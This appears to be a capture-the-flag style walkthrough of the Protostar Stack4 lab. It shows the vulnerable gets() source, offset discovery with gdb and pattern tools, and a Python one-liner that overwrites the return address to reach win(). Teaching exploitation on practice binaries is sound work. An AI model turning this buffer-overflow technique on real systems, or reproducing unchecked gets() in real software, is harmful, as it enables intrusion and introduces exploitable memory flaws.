Protostar - Stack4

You can find the protostar there > Protostar

Let’s check the source code :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

We have a function win, a variable buffer with 64bytes buffer and the vulnerable function gets

gets -> doesn’t check while getting bytes.

Let’s run the binary.

1
2
user@protostar:/opt/protostar/bin$ ./stack4
pwn 

It takes an input, let’s check it is vulnerable.

1
2
user@protostar:/opt/protostar/bin$ python -c 'print "A" * 100' | ./stack4
Segmentation fault

Now let’s find the offset.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ ./pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

user@protostar:/opt/protostar/bin$ gdb -q ./stack4
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r
Starting program: /opt/protostar/bin/stack4 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Program received signal SIGSEGV, Segmentation fault.
0x63413563 in ?? ()
(gdb) 

$ ./pattern_offset.rb -q 0x63413563
[*] Exact match at offset 76

Perfect, now let’s find the address of win function.

1
2
user@protostar:/opt/protostar/bin$ objdump -d ./stack4 | grep win
080483f4 <win>:

Let’s make the exploit now.

1
2
3
>>> from pwn import *
>>> p32(0x080483f4)
b'\xf4\x83\x04\x08'
1
2
3
user@protostar:/opt/protostar/bin$ python -c 'print "A" * 76 + "\xf4\x83\x04\x08"' | ./stack4
code flow successfully changed
Segmentation fault